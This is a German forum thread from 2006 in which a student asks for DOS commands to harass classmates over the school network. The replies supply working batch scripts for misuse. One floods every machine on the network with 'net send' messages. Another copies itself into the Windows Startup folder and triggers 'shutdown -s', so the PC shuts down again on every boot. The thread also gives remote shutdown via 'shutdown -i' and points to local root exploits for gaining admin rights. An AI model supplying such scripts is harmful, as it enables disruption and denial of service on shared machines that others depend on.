DOS Commands per Netzwerk

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von dannyt, 10. Februar 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 10. Februar 2006
    Hi Leutz,

    ich suche paar commands wie z.b. net send um in der Schule andere zu nerven ^^. Leider kann man net send auch einfach in die ecke schieben, und es stört dann nicht weiter...kann man das vielleicht auch irgendwie verhindern? Außerdem kann ich den command shutdown nicht ausführen, weil mir die rechte auf dem rechner fehlen..also auf dem Zielrechner. Admin Rechte habe ich bereits. Würde mich freuen wenn mir jemand noch mehr DOS Commands zeigen könnte mit denen man am anderen Rechner über das Netzwerk etwas anstellen kann :)

    ThanX schonmal,

    dannyt
     

  2. Anzeige
  3. #2 10. Februar 2006
    um das ganze zu stoppen musst du einfach
    net stop nachrichtendienst
    eingeben oder
    net start nachrichtendienst
     
  4. #3 11. Februar 2006
    oder falls dir das nicht weiter hilft kannste den dienst unter systemsteuerung---->verwaltung---->dienste---->und dann auf den nachrichtendienst klicken und ihn auf manuel schalten falls des noch nicht eingestellt is und dann auf beenden.
     
  5. #4 12. Februar 2006
    Thx, aber ich meinte eigentlich dass, wenn ich jemanden die Nachricht schicke, dass derjenige die nicht einfach wegschieben kann, sondern dass der die wegklicken muss.
     
  6. #5 12. Februar 2006
    Du hast für Nachrichten nur den netsend-Befehl, und das Problem kenn ich :D
    Da lässt sich nichts machen...
     
  7. #6 1. März 2006
    net send

    schreib einfach ne BAT die so aus sieht



    net send * deintext
    q.bat


    dann speichers die unter q.bat

    dann klickste mehrmals auf die bat und es werden unendlich viele nachrichten geschickt und zwar an alle rechner im netzwerk du kannst anstelle des sternchen auch die IP eingeben dann wird die nachricht nur an einen rechner geschikt is schon lustig wenn alle rechner im lan 50000000000 nachrichten bekommen dann is nichts mehr mit unten in die ecke schieben da die neue nachricht immer in der mitte des monitor angezeigt wird :D
     
  8. #7 1. März 2006
    Wenn du in der Schule mal richtig Ärger machen willst dann kopier in ein Textdokument einfach diesen Code:

    copy a.bat C:\dokume~1\alluse~1\startm~1\Progra~1\Autost~1\
    shutdown -s


    Dann speicherst du das Ganze unter a.bat ab und klickst in der Schule drauf.Die Konsiquenz von den Ganzen ist,dass sich in den Autostart(in den Ordner sind alle Daten die beim Computerstart gestartet werden) deine Datei hinenkopiert und dann den befehl shutdown -s auslöst ,der den PC wieder herunterfährt.Wenn du das ganze wieder beheben möchtest gibst du in Ausführen shutdown -a ein und löscht die Datei im Autostart wieder....


    und noch was :
    Es gibt den Befehl
    shutdown -i

    Da brauchst du nur den PCnamen um Netzwerk angeben und schon fährt es diesen PC herunter...

    Viel Spaß mit diesen Tipps :D
     
  9. #8 1. März 2006
    1.) thema hatten wir shcon 78903247x
    2.) sufu
     
  10. #9 2. März 2006
    Wie verschafft man sich denn Admin rechte über dos?
     
  11. #10 2. März 2006
    local root exploit => dazu google, sufu
     
  12. #11 2. März 2006
    Zuletzt von einem Moderator bearbeitet: 13. April 2017
    Gründe für die Schließung des Themas:

    [*] Sonstiges: Thema beendet! Falls nicht, einfach bei mir melden!

    Lies Dir nochmals die Forenregeln bzw. die Undergroundregeln durch.
     

  13. Videos zum Thema
Die Seite wird geladen...